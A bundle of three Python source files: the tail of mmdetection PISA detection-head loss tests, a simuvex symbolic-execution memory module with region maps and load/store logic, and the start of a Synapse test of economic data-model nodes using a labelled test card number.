'there should be no box loss when there are no true boxes')
# When truth is non-empty then both cls and box loss should be nonzero for
# random inputs
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
one_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
onegt_cls_loss = one_gt_losses['loss_cls'].sum()
onegt_box_loss = one_gt_losses['loss_bbox'].sum()
assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
def test_pisa_ssd_head_loss():
"""Tests pisa ssd head loss when truth is empty and non-empty."""
s = 256
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.,
ignore_iof_thr=-1,
gt_max_assign_all=False),
isr=dict(k=2., bias=0.),
carl=dict(k=1., bias=0.2),
smoothl1_beta=1.,
allowed_border=-1,
pos_weight=-1,
neg_pos_ratio=3,
debug=False))
ssd_anchor_generator = dict(
type='SSDAnchorGenerator',
scale_major=False,
input_size=300,
strides=[1],
ratios=([2], ),
basesize_ratio_range=(0.15, 0.9))
self = PISASSDHead(
num_classes=4,
in_channels=(1, ),
train_cfg=cfg,
anchor_generator=ssd_anchor_generator)
# Anchor head expects multiple levels of features per image
feat = [
torch.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
for i in range(len(self.anchor_generator.strides))
]
cls_scores, bbox_preds = self.forward(feat)
# Test that empty ground truth encourages the network to predict background
gt_bboxes = [torch.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_bboxes_ignore = None
empty_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
# When there is no truth, the cls loss should be nonzero but there should
# be no box loss.
empty_cls_loss = sum(empty_gt_losses['loss_cls'])
empty_box_loss = sum(empty_gt_losses['loss_bbox'])
# SSD is special: #pos:#neg = 1:3, so an empty gt also leads to cls loss = 0
assert empty_cls_loss.item() == 0, 'cls loss should be zero when there are no true boxes'
assert empty_box_loss.item() == 0, (
'there should be no box loss when there are no true boxes')
# When truth is non-empty then both cls and box loss should be nonzero for
# random inputs
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
one_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
onegt_cls_loss = sum(one_gt_losses['loss_cls'])
onegt_box_loss = sum(one_gt_losses['loss_bbox'])
assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
def test_pisa_roi_head_loss():
"""Tests pisa roi head loss when truth is empty and non-empty."""
train_cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
match_low_quality=True,
ignore_iof_thr=-1),
sampler=dict(
type='ScoreHLRSampler',
num=4,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True,
k=0.5,
bias=0.),
isr=dict(k=2., bias=0.),
carl=dict(k=1., bias=0.2),
allowed_border=0,
pos_weight=-1,
debug=False))
bbox_roi_extractor = dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=1,
featmap_strides=[1])
bbox_head = dict(
type='Shared2FCBBoxHead',
in_channels=1,
fc_out_channels=2,
roi_feat_size=7,
num_classes=4,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0))
self = PISARoIHead(bbox_roi_extractor, bbox_head, train_cfg=train_cfg)
s = 256
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
# Anchor head expects multiple levels of features per image
feat = [
torch.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
for i in range(1)
]
proposal_list = [
torch.Tensor([[22.6667, 22.8757, 238.6326, 151.8874], [0, 3, 5, 7]])
]
# Test that empty ground truth encourages the network to predict background
gt_bboxes = [torch.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_bboxes_ignore = None
empty_gt_losses = self.forward_train(feat, img_metas, proposal_list,
gt_bboxes, gt_labels,
gt_bboxes_ignore)
# When there is no truth, the cls loss should be nonzero but there should
# be no box loss.
empty_cls_loss = empty_gt_losses['loss_cls'].sum()
empty_box_loss = empty_gt_losses['loss_bbox'].sum()
assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
assert empty_box_loss.item() == 0, (
'there should be no box loss when there are no true boxes')
# When truth is non-empty then both cls and box loss should be nonzero for
# random inputs
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
one_gt_losses = self.forward_train(feat, img_metas, proposal_list,
gt_bboxes, gt_labels, gt_bboxes_ignore)
onegt_cls_loss = one_gt_losses['loss_cls'].sum()
onegt_box_loss = one_gt_losses['loss_bbox'].sum()
assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
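# These are plain pytest-style test functions; assuming this file sits in the
# mmdetection test suite, they can be run directly, e.g. (the path below is an
# assumption about the repository layout):
#
#   pytest tests/test_models/test_dense_heads/test_pisa_head.py -k pisa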
|
|
#!/usr/bin/env python
import logging
l = logging.getLogger("simuvex.storage.memory")
import claripy
from ..plugins.plugin import SimStatePlugin
stn_map = { 'st%d' % n: n for n in xrange(8) }
tag_map = { 'tag%d' % n: n for n in xrange(8) }
class AddressWrapper(object):
"""
AddressWrapper is used in SimAbstractMemory, which provides extra meta information for an address (or a ValueSet
object) that is normalized from an integer/BVV/StridedInterval.
"""
def __init__(self, region, region_base_addr, address, is_on_stack, function_address):
"""
Constructor for the class AddressWrapper.
:param str region: Name of the memory region it belongs to.
:param int region_base_addr: Base address of the memory region
:param address: An address (not a ValueSet object).
:param bool is_on_stack: Whether this address is on a stack region or not.
:param int function_address: Related function address (if any).
"""
self.region = region
self.region_base_addr = region_base_addr
self.address = address
self.is_on_stack = is_on_stack
self.function_address = function_address
def __hash__(self):
return hash((self.region, self.address))
def __eq__(self, other):
return self.region == other.region and self.address == other.address
def __repr__(self):
return "<%s> %s" % (self.region, hex(self.address))
def to_valueset(self, state):
"""
Convert to a ValueSet instance
:param state: A state
:return: The converted ValueSet instance
"""
return state.se.VS(state.arch.bits, self.region, self.region_base_addr, self.address)
class RegionDescriptor(object):
"""
Descriptor for a memory region ID.
"""
def __init__(self, region_id, base_address, related_function_address=None):
self.region_id = region_id
self.base_address = base_address
self.related_function_address = related_function_address
def __repr__(self):
return "<%s - %#x>" % (
self.region_id,
self.related_function_address if self.related_function_address is not None else 0
)
class RegionMap(object):
"""
Mostly used in SimAbstractMemory, RegionMap stores a series of mappings between concrete memory address ranges and
memory regions, like stack frames and heap regions.
"""
def __init__(self, is_stack):
"""
Constructor
:param is_stack: Whether this is a region map for stack frames or not. Different strategies apply for stack
regions.
"""
self.is_stack = is_stack
# An AVLTree, which maps stack addresses to region IDs
self._address_to_region_id = AVLTree()
# A dict, which maps region IDs to memory address ranges
self._region_id_to_address = { }
#
# Properties
#
def __repr__(self):
return "RegionMap<%s>" % (
"S" if self.is_stack else "H"
)
@property
def is_empty(self):
return len(self._address_to_region_id) == 0
@property
def stack_base(self):
if not self.is_stack:
raise SimRegionMapError('Calling "stack_base" on a non-stack region map.')
return self._address_to_region_id.max_key()
@property
def region_ids(self):
return self._region_id_to_address.keys()
#
# Public methods
#
def copy(self):
r = RegionMap(is_stack=self.is_stack)
# A shallow copy should be enough, since we never modify any RegionDescriptor object in-place
if len(self._address_to_region_id) > 0:
# TODO: There is a bug in bintrees 2.0.2 that prevents us from copying a non-empty AVLTree object
# TODO: Consider submitting a pull request
r._address_to_region_id = self._address_to_region_id.copy()
r._region_id_to_address = self._region_id_to_address.copy()
return r
def map(self, absolute_address, region_id, related_function_address=None):
"""
Add a mapping between an absolute address and a region ID. If this is a stack region map, all stack regions
beyond (lower than) this newly added region will be discarded.
:param absolute_address: An absolute memory address.
:param region_id: ID of the memory region.
:param related_function_address: A related function address, mostly used for stack regions.
"""
if self.is_stack:
# Sanity check
if not region_id.startswith('stack_'):
raise SimRegionMapError('Received a non-stack memory ID "%s" in a stack region map' % region_id)
# Remove all stack regions that are lower than the one to add
while True:
try:
addr = self._address_to_region_id.floor_key(absolute_address)
descriptor = self._address_to_region_id[addr]
# Remove this mapping
del self._address_to_region_id[addr]
# Remove this region ID from the other mapping
del self._region_id_to_address[descriptor.region_id]
except KeyError:
break
else:
if absolute_address in self._address_to_region_id:
descriptor = self._address_to_region_id[absolute_address]
# Remove this mapping
del self._address_to_region_id[absolute_address]
del self._region_id_to_address[descriptor.region_id]
# Add this new region mapping
desc = RegionDescriptor(
region_id,
absolute_address,
related_function_address=related_function_address
)
self._address_to_region_id[absolute_address] = desc
self._region_id_to_address[region_id] = desc
def unmap_by_address(self, absolute_address):
"""
Removes a mapping based on its absolute address.
:param absolute_address: An absolute address
"""
desc = self._address_to_region_id[absolute_address]
del self._address_to_region_id[absolute_address]
del self._region_id_to_address[desc.region_id]
def absolutize(self, region_id, relative_address):
"""
Convert a relative address in some memory region to an absolute address.
:param region_id: The memory region ID
:param relative_address: The relative memory offset in that memory region
:return: An absolute address if converted; an exception is raised when the region ID does not
exist.
"""
if region_id == 'global':
# The global region is always based at address 0
return relative_address
if region_id not in self._region_id_to_address:
raise SimRegionMapError('Non-existent region ID "%s"' % region_id)
base_address = self._region_id_to_address[region_id].base_address
return base_address + relative_address
def relativize(self, absolute_address, target_region_id=None):
"""
Convert an absolute address to the memory offset in a memory region.
Note that if an address that belongs to a heap region is passed to a stack region map, it will be converted
to an offset within the closest stack frame, and vice versa for a stack address passed to a heap region map.
Therefore you should only pass in addresses that belong to the same category (stack or non-stack) as this
region map.
:param absolute_address: An absolute memory address
:return: A tuple of the closest region ID, the relative offset, and the related function
address.
"""
if target_region_id is None:
if self.is_stack:
# Get the base address of the stack frame it belongs to
base_address = self._address_to_region_id.ceiling_key(absolute_address)
else:
try:
base_address = self._address_to_region_id.floor_key(absolute_address)
except KeyError:
# Not found. It belongs to the global region then.
return 'global', absolute_address, None
descriptor = self._address_to_region_id[base_address]
else:
if target_region_id == 'global':
# Just return the absolute address
return 'global', absolute_address, None
if target_region_id not in self._region_id_to_address:
raise SimRegionMapError('Trying to relativize to a non-existent region "%s"' % target_region_id)
descriptor = self._region_id_to_address[target_region_id]
base_address = descriptor.base_address
return descriptor.region_id, absolute_address - base_address, descriptor.related_function_address
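# Illustrative sketch of a (non-stack) RegionMap round trip; the addresses and
# the region ID below are made up:
#
#   rm = RegionMap(is_stack=False)
#   rm.map(0x601000, 'heap_0')
#   rm.absolutize('heap_0', 0x20)     # -> 0x601020
#   rm.relativize(0x601020)           # -> ('heap_0', 0x20, None)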
class MemoryStoreRequest(object):
"""
A MemoryStoreRequest is used internally by SimMemory to track memory request data.
"""
def __init__(self, addr, data=None, size=None, condition=None, endness=None):
self.addr = addr
self.data = data
self.size = size
self.condition = condition
self.endness = endness
# was this store done?
self.completed = False
# stuff that's determined during handling
self.actual_addresses = None
self.constraints = [ ]
self.fallback_values = None
self.symbolic_sized_values = None
self.conditional_values = None
self.simplified_values = None
self.stored_values = None
def _adjust_condition(self, state):
self.condition = state._adjust_condition(self.condition)
class SimMemory(SimStatePlugin):
"""
Represents the memory space of the process.
"""
def __init__(self, endness=None, abstract_backer=None):
SimStatePlugin.__init__(self)
self.id = None
self.endness = "Iend_BE" if endness is None else endness
# Whether this memory is internally used inside SimAbstractMemory
self._abstract_backer = abstract_backer
#
# These are some performance-critical thresholds
#
# The maximum range of a normal write operation. If an address range is greater than this number,
# SimMemory will simply concretize it to a single value. Note that this is only relevant when
# the "symbolic" concretization strategy is enabled for writes.
self._write_address_range = 128
self._write_address_range_approx = 128
# The maximum range of a symbolic read address. If an address range is greater than this number,
# SimMemory will simply concretize it.
self._read_address_range = 1024
self._read_address_range_approx = 1024
# The maximum size of a symbolic-sized operation. If a size maximum is greater than this number,
# SimMemory will constrain it to this number. If the size minimum is greater than this
# number, a SimMemoryLimitError is thrown.
self._maximum_symbolic_size = 8 * 1024
self._maximum_symbolic_size_approx = 4*1024
# Same, but for concrete writes
self._maximum_concrete_size = 0x1000000
@property
def category(self):
"""
Return the category of this SimMemory instance. It can be one of the three following categories: reg, mem,
or file.
"""
if self.id in ('reg', 'mem'):
return self.id
elif self._abstract_backer:
return 'mem'
elif self.id.startswith('file'):
return 'file'
else:
raise SimMemoryError('Unknown SimMemory category for memory_id "%s"' % self.id)
def _resolve_location_name(self, name):
if self.category == 'reg':
if self.state.arch.name in ('X86', 'AMD64'):
if name in stn_map:
return (((stn_map[name] + self.load('ftop')) & 7) << 3) + self.state.arch.registers['fpu_regs'][0], 8
elif name in tag_map:
return ((tag_map[name] + self.load('ftop')) & 7) + self.state.arch.registers['fpu_tags'][0], 1
return self.state.arch.registers[name]
elif name[0] == '*':
return self.state.registers.load(name[1:]), None
else:
raise SimMemoryError("Trying to address memory with a register name.")
def _convert_to_ast(self, data_e, size_e=None):
"""
Make an AST out of concrete @data_e
"""
if type(data_e) is str:
# Convert the string into a BVV, *regardless of endness*
bits = len(data_e) * 8
data_e = self.state.se.BVV(data_e, bits)
elif type(data_e) in (int, long):
data_e = self.state.se.BVV(data_e, size_e*8 if size_e is not None
else self.state.arch.bits)
else:
data_e = data_e.to_bv()
return data_e
def store(self, addr, data, size=None, condition=None, add_constraints=None, endness=None, action=None, inspect=True, priv=None):
"""
Stores content into memory.
:param addr: A claripy expression representing the address to store at.
:param data: The data to store (claripy expression or something convertible to a claripy expression).
:param size: A claripy expression representing the size of the data to store.
The following parameters are optional.
:param condition: A claripy expression representing a condition if the store is conditional.
:param add_constraints: Add constraints resulting from the merge (default: True).
:param endness: The endianness for the data.
:param action: A SimActionData to fill out with the final written value and constraints.
"""
if priv is not None: self.state.scratch.push_priv(priv)
addr_e = _raw_ast(addr)
data_e = _raw_ast(data)
size_e = _raw_ast(size)
condition_e = _raw_ast(condition)
add_constraints = True if add_constraints is None else add_constraints
if isinstance(addr, str):
named_addr, named_size = self._resolve_location_name(addr)
addr = named_addr
addr_e = addr
if size is None:
size = named_size
size_e = size
# store everything as a BV
data_e = self._convert_to_ast(data_e, size_e if isinstance(size_e, (int, long)) else None)
if type(size_e) in (int, long):
size_e = self.state.se.BVV(size_e, self.state.arch.bits)
if inspect is True:
if self.category == 'reg':
self.state._inspect(
'reg_write',
BP_BEFORE,
reg_write_offset=addr_e,
reg_write_length=size_e,
reg_write_expr=data_e)
addr_e = self.state._inspect_getattr('reg_write_offset', addr_e)
size_e = self.state._inspect_getattr('reg_write_length', size_e)
data_e = self.state._inspect_getattr('reg_write_expr', data_e)
elif self.category == 'mem':
self.state._inspect(
'mem_write',
BP_BEFORE,
mem_write_address=addr_e,
mem_write_length=size_e,
mem_write_expr=data_e,
)
addr_e = self.state._inspect_getattr('mem_write_address', addr_e)
size_e = self.state._inspect_getattr('mem_write_length', size_e)
data_e = self.state._inspect_getattr('mem_write_expr', data_e)
# if the condition is false, bail
if condition_e is not None and self.state.se.is_false(condition_e):
if priv is not None: self.state.scratch.pop_priv()
return
if (
o.UNDER_CONSTRAINED_SYMEXEC in self.state.options and
isinstance(addr_e, claripy.ast.Base) and
addr_e.uninitialized
):
self._constrain_underconstrained_index(addr_e)
request = MemoryStoreRequest(addr_e, data=data_e, size=size_e, condition=condition_e, endness=endness)
self._store(request)
if inspect is True:
if self.category == 'reg': self.state._inspect('reg_write', BP_AFTER)
if self.category == 'mem': self.state._inspect('mem_write', BP_AFTER)
add_constraints = self.state._inspect_getattr('address_concretization_add_constraints', add_constraints)
if add_constraints and len(request.constraints) > 0:
self.state.add_constraints(*request.constraints)
if request.completed and o.AUTO_REFS in self.state.options and action is None and not self._abstract_backer:
ref_size = size if size is not None else (data_e.size() / 8)
region_type = self.category
if region_type == 'file':
# Special handling for files to keep compatibility
# We may use some refactoring later
region_type = self.id
action = SimActionData(self.state, region_type, 'write', addr=addr, data=data, size=ref_size, condition=condition)
self.state.log.add_action(action)
if request.completed and action is not None:
action.actual_addrs = request.actual_addresses
action.actual_value = action._make_object(request.stored_values[0]) # TODO
if len(request.constraints) > 0:
action.added_constraints = action._make_object(self.state.se.And(*request.constraints))
else:
action.added_constraints = action._make_object(self.state.se.true)
if priv is not None: self.state.scratch.pop_priv()
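# Example (hedged sketch): typical store() calls. The state object and addresses
# are made up; BVV widths are in bits, store sizes in bytes.
#
#   state.memory.store(0x1000, state.se.BVV(0x41414141, 32))        # plain write
#   state.memory.store(0x2000, data, size=8, endness='Iend_LE')     # explicit size/endness
#   state.registers.store('rax', state.se.BVV(0, 64))               # register writes go by name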
def _store(self, request):
raise NotImplementedError()
def store_cases(self, addr, contents, conditions, fallback=None, add_constraints=None, endness=None, action=None):
"""
Stores content into memory, conditional by case.
:param addr: A claripy expression representing the address to store at.
:param contents: A list of bitvectors, not necessarily of the same size. Use None to denote an empty
write.
:param conditions: A list of conditions. Must be equal in length to contents.
The following parameters are optional.
:param fallback: A claripy expression representing what the write should resolve to if all conditions
evaluate to false (default: whatever was there before).
:param add_constraints: Add constraints resulting from the merge (default: True)
:param endness: The endianness for contents as well as fallback.
:param action: A SimActionData to fill out with the final written value and constraints.
:type action: simuvex.s_action.SimActionData
"""
if fallback is None and all(c is None for c in contents):
l.debug("Avoiding an empty write.")
return
addr_e = _raw_ast(addr)
contents_e = _raw_ast(contents)
conditions_e = _raw_ast(conditions)
fallback_e = _raw_ast(fallback)
max_bits = max(c.length for c in contents_e if isinstance(c, claripy.ast.Bits)) if fallback is None else fallback.length
# if fallback is not provided by user, load it from memory
# remember to specify the endianness!
fallback_e = self.load(addr, max_bits/8, add_constraints=add_constraints, endness=endness) if fallback_e is None else fallback_e
req = self._store_cases(addr_e, contents_e, conditions_e, fallback_e, endness=endness)
add_constraints = self.state._inspect_getattr('address_concretization_add_constraints', add_constraints)
if add_constraints:
self.state.add_constraints(*req.constraints)
if req.completed and o.AUTO_REFS in self.state.options and action is None:
region_type = self.category
if region_type == 'file':
# Special handling for files to keep compatibility
# We may use some refactoring later
region_type = self.id
action = SimActionData(self.state, region_type, 'write', addr=addr, data=req.stored_values[-1], size=max_bits/8, condition=self.state.se.Or(*conditions), fallback=fallback)
self.state.log.add_action(action)
if req.completed and action is not None:
action.actual_addrs = req.actual_addresses
action.actual_value = action._make_object(req.stored_values[-1])
action.added_constraints = action._make_object(self.state.se.And(*req.constraints) if len(req.constraints) > 0 else self.state.se.true)
def _store_cases(self, addr, contents, conditions, fallback, endness=None):
extended_contents = [ ]
for c in contents:
if c is None:
c = fallback
else:
need_bits = fallback.length - c.length
if need_bits > 0:
c = c.concat(fallback[need_bits-1:0])
extended_contents.append(c)
case_constraints = { }
for c,g in zip(extended_contents, conditions):
if c not in case_constraints:
case_constraints[c] = [ ]
case_constraints[c].append(g)
unique_contents = [ ]
unique_constraints = [ ]
for c,g in case_constraints.items():
unique_contents.append(c)
unique_constraints.append(self.state.se.Or(*g))
if len(unique_contents) == 1 and unique_contents[0] is fallback:
req = MemoryStoreRequest(addr, data=fallback, endness=endness)
return self._store(req)
else:
simplified_contents = [ ]
simplified_constraints = [ ]
for c,g in zip(unique_contents, unique_constraints):
simplified_contents.append(self.state.se.simplify(c))
simplified_constraints.append(self.state.se.simplify(g))
cases = zip(simplified_constraints, simplified_contents)
#cases = zip(unique_constraints, unique_contents)
ite = self.state.se.simplify(self.state.se.ite_cases(cases, fallback))
req = MemoryStoreRequest(addr, data=ite, endness=endness)
return self._store(req)
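# Example (hedged sketch): a cased write through store_cases(). `flag` is an
# assumed symbolic boolean; a None entry leaves memory unchanged for that case.
#
#   state.memory.store_cases(
#       0x3000,
#       contents=[state.se.BVV(1, 8), None],
#       conditions=[flag, state.se.Not(flag)],
#   )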
def load(self, addr, size=None, condition=None, fallback=None, add_constraints=None, action=None, endness=None, inspect=True):
"""
Loads `size` bytes from `addr`.
:param addr: The address to load from.
:param size: The size (in bytes) of the load.
:param condition: A claripy expression representing a condition for a conditional load.
:param fallback: A fallback value if the condition ends up being False.
:param add_constraints: Add constraints resulting from the merge (default: True).
:param action: A SimActionData to fill out with the constraints.
:param endness: The endness to load with.
There are a few possible return values. If no condition or fallback are passed in,
then the return is the bytes at the address, in the form of a claripy expression.
For example:
<A BVV(0x41, 32)>
On the other hand, if a condition and fallback are provided, the value is conditional:
<A If(condition, BVV(0x41, 32), fallback)>
"""
add_constraints = True if add_constraints is None else add_constraints
addr_e = _raw_ast(addr)
size_e = _raw_ast(size)
condition_e = _raw_ast(condition)
fallback_e = _raw_ast(fallback)
if isinstance(addr, str):
named_addr, named_size = self._resolve_location_name(addr)
addr = named_addr
addr_e = addr
if size is None:
size = named_size
size_e = size
if size is None:
size = self.state.arch.bits / 8
size_e = size
if inspect is True:
if self.category == 'reg':
self.state._inspect('reg_read', BP_BEFORE, reg_read_offset=addr_e, reg_read_length=size_e)
addr_e = self.state._inspect_getattr("reg_read_offset", addr_e)
size_e = self.state._inspect_getattr("reg_read_length", size_e)
elif self.category == 'mem':
self.state._inspect('mem_read', BP_BEFORE, mem_read_address=addr_e, mem_read_length=size_e)
addr_e = self.state._inspect_getattr("mem_read_address", addr_e)
size_e = self.state._inspect_getattr("mem_read_length", size_e)
if (
o.UNDER_CONSTRAINED_SYMEXEC in self.state.options and
isinstance(addr_e, claripy.ast.Base) and
addr_e.uninitialized
):
self._constrain_underconstrained_index(addr_e)
a,r,c = self._load(addr_e, size_e, condition=condition_e, fallback=fallback_e)
add_constraints = self.state._inspect_getattr('address_concretization_add_constraints', add_constraints)
if add_constraints and c:
self.state.add_constraints(*c)
if (self.category == 'mem' and o.SIMPLIFY_MEMORY_READS in self.state.options) or \
(self.category == 'reg' and o.SIMPLIFY_REGISTER_READS in self.state.options):
l.debug("simplifying %s read...", self.category)
r = self.state.simplify(r)
if not self._abstract_backer and \
o.UNINITIALIZED_ACCESS_AWARENESS in self.state.options and \
self.state.uninitialized_access_handler is not None and \
(r.op == 'Reverse' or r.op == 'I') and \
hasattr(r._model_vsa, 'uninitialized') and \
r._model_vsa.uninitialized:
normalized_addresses = self.normalize_address(addr)
if len(normalized_addresses) > 0 and type(normalized_addresses[0]) is AddressWrapper:
normalized_addresses = [ (aw.region, aw.address) for aw in normalized_addresses ]
self.state.uninitialized_access_handler(self.category, normalized_addresses, size, r, self.state.scratch.bbl_addr, self.state.scratch.stmt_idx)
# the endianness
endness = self.endness if endness is None else endness
if endness == "Iend_LE":
r = r.reversed
if inspect is True:
if self.category == 'mem':
self.state._inspect('mem_read', BP_AFTER, mem_read_expr=r)
r = self.state._inspect_getattr("mem_read_expr", r)
elif self.category == 'reg':
self.state._inspect('reg_read', BP_AFTER, reg_read_expr=r)
r = self.state._inspect_getattr("reg_read_expr", r)
if o.AST_DEPS in self.state.options and self.category == 'reg':
r = SimActionObject(r, reg_deps=frozenset((addr,)))
if o.AUTO_REFS in self.state.options and action is None:
ref_size = size if size is not None else (r.size() / 8)
region_type = self.category
if region_type == 'file':
# Special handling for files to keep compatibility
# We may use some refactoring later
region_type = self.id
action = SimActionData(self.state, region_type, 'read', addr=addr, data=r, size=ref_size, condition=condition, fallback=fallback)
self.state.log.add_action(action)
if action is not None:
action.actual_addrs = a
action.added_constraints = action._make_object(self.state.se.And(*c) if len(c) > 0 else self.state.se.true)
return r
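# Example (hedged sketch): loads, including the conditional form described in
# the docstring above. The addresses and `cond` are made up.
#
#   v = state.memory.load(0x1000, 4, endness='Iend_LE')    # plain 4-byte read
#   v = state.memory.load(0x1000, 4, condition=cond,
#                         fallback=state.se.BVV(0, 32))    # If(cond, mem, fallback)
#   rax = state.registers.load('rax')                      # named register read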
def _constrain_underconstrained_index(self, addr_e):
if not self.state.uc_manager.is_bounded(addr_e) or self.state.se.max_int(addr_e) - self.state.se.min_int(addr_e) >= self._read_address_range:
# in under-constrained symbolic execution, we'll assign a new memory region for this address
mem_region = self.state.uc_manager.assign(addr_e)
# ... but only if it's not already been constrained to something!
if self.state.se.solution(addr_e, mem_region):
self.state.add_constraints(addr_e == mem_region)
l.debug('Under-constrained symbolic execution: assigned a new memory region @ %s to %s', mem_region, addr_e)
def normalize_address(self, addr, is_write=False): #pylint:disable=no-self-use,unused-argument
"""
Normalize `addr` for use in static analysis (with the abstract memory model). In non-abstract mode, simply
returns the address in a single-element list.
"""
return [ addr ]
def _load(self, addr, size, condition=None, fallback=None):
raise NotImplementedError()
def find(self, addr, what, max_search=None, max_symbolic_bytes=None, default=None, step=1):
"""
Returns the address of bytes equal to `what`, starting from `addr`. Note that, if you don't specify a default
value, this search could cause the state to go unsat if no possible matching byte exists.
:param addr: The start address.
:param what: What to search for.
:param max_search: Search at most this many bytes.
:param max_symbolic_bytes: Search through at most this many symbolic bytes.
:param default: The default value, if what you're looking for wasn't found.
:returns: An expression representing the address of the matching byte.
"""
addr = _raw_ast(addr)
what = _raw_ast(what)
default = _raw_ast(default)
if isinstance(what, str):
# Convert it to a BVV
what = claripy.BVV(what, len(what) * 8)
r,c,m = self._find(addr, what, max_search=max_search, max_symbolic_bytes=max_symbolic_bytes, default=default,
step=step)
if o.AST_DEPS in self.state.options and self.category == 'reg':
r = SimActionObject(r, reg_deps=frozenset((addr,)))
return r,c,m
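# Example (hedged sketch): locate a NUL terminator the way strlen-style code
# would; `buf_addr` and the limits below are illustrative.
#
#   addr_expr, constraints, match_indices = state.memory.find(
#       buf_addr, state.se.BVV(0, 8), max_search=256, max_symbolic_bytes=16)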
def _find(self, addr, what, max_search=None, max_symbolic_bytes=None, default=None, step=1):
raise NotImplementedError()
def copy_contents(self, dst, src, size, condition=None, src_memory=None, dst_memory=None):
"""
Copies data within a memory.
:param dst: A claripy expression representing the address of the destination
:param src: A claripy expression representing the address of the source
The following parameters are optional.
:param src_memory: Copy data from this SimMemory instead of self
:param dst_memory: Copy data to this SimMemory instead of self
:param size: A claripy expression representing the size of the copy
:param condition: A claripy expression representing a condition, if the write should be conditional. If this
is determined to be false, the size of the copy will be 0.
"""
dst = _raw_ast(dst)
src = _raw_ast(src)
size = _raw_ast(size)
condition = _raw_ast(condition)
return self._copy_contents(dst, src, size, condition=condition, src_memory=src_memory, dst_memory=dst_memory)
def _copy_contents(self, dst, src, size, condition=None, src_memory=None, dst_memory=None):
raise NotImplementedError()
from bintrees import AVLTree
from .. import s_options as o
from ..s_action import SimActionData
from ..s_action_object import SimActionObject, _raw_ast
from ..s_errors import SimMemoryError, SimRegionMapError
from ..plugins.inspect import BP_BEFORE, BP_AFTER
|
|
import synapse.exc as s_exc
import synapse.tests.utils as s_utils
import synapse.common as s_common
class EconTest(s_utils.SynTest):
async def test_model_econ(self):
async with self.getTestCore() as core:
# test card number 4024007150779444
card = (await core.nodes('[ econ:pay:card="*" :expr=201802 :name="Bob Smith" :cvv=123 :pin=1234 :pan=4024007150779444 ]'))[0]
self.eq('bob smith', card.get('name'))
self.eq(1517443200000, card.get('expr'))
self.eq('4024007150779444', card.get('pan'))
self.eq(4, card.get('pan:mii'))
self.eq(402400, card.get('pan:iin'))
place = s_common.guid()
bycont = s_common.guid()
fromcont = s_common.guid()
text = f'''[
econ:purchase="*"
:price=13.37
:currency=USD
:by:contact={bycont}
:from:contact={fromcont}
:time=20180202
:place={place}
:paid=true
:paid:time=20180202
:settled=20180205
]'''
perc = (await core.nodes(text))[0]
self.eq('13.37', perc.get('price'))
self.eq('usd', perc.get('currency'))
self.len(1, await core.nodes('econ:purchase:price=13.37'))
self.len(1, await core.nodes('econ:purchase:price=13.370'))
self.len(0, await core.nodes('econ:purchase:price=13.372'))
with self.raises(s_exc.BadTypeValu):
await core.nodes('econ:purchase [ :price=730750818665451459101843 ]')
with self.raises(s_exc.BadTypeValu):
await core.nodes('econ:purchase [ :price=-730750818665451459101843 ]')
self.len(1, await core.nodes('econ:purchase:price*range=(13,14)'))
self.len(1, await core.nodes('econ:purchase:price>10.00'))
self.len(1, await core.nodes('econ:purchase:price<20.00'))
self.len(1, await core.nodes('econ:purchase:price>=10.00'))
self.len(1, await core.nodes('econ:purchase:price>=13.37'))
self.len(1, await core.nodes('econ:purchase:price<=20.00'))
self.len(1, await core.nodes('econ:purchase:price<=13.37'))
self.len(0, await core.nodes('econ:purchase:price<10.00'))
self.len(0, await core.nodes('econ:purchase:price>20.00'))
self.len(0, await core.nodes('econ:purchase:price>=20.00'))
self.len(0, await core.nodes('econ:purchase:price<=10.00'))
# runtime filter/cmpr test for econ:price
self.len(1, await core.nodes('econ:purchase:price +:price=13.37'))
self.len(1, await core.nodes('econ:purchase:price +:price=13.370'))
self.len(0, await core.nodes('econ:purchase:price +:price=13.372'))
self.len(1, await core.nodes('econ:purchase:price +:price*range=(13,14)'))
self.len(1, await core.nodes('econ:purchase:price +:price>10.00'))
self.len(1, await core.nodes('econ:purchase:price +:price<20.00'))
self.len(1, await core.nodes('econ:purchase:price +:price>=10.00'))
self.len(1, await core.nodes('econ:purchase:price +:price>=13.37'))
self.len(1, await core.nodes('econ:purchase:price +:price<=20.00'))
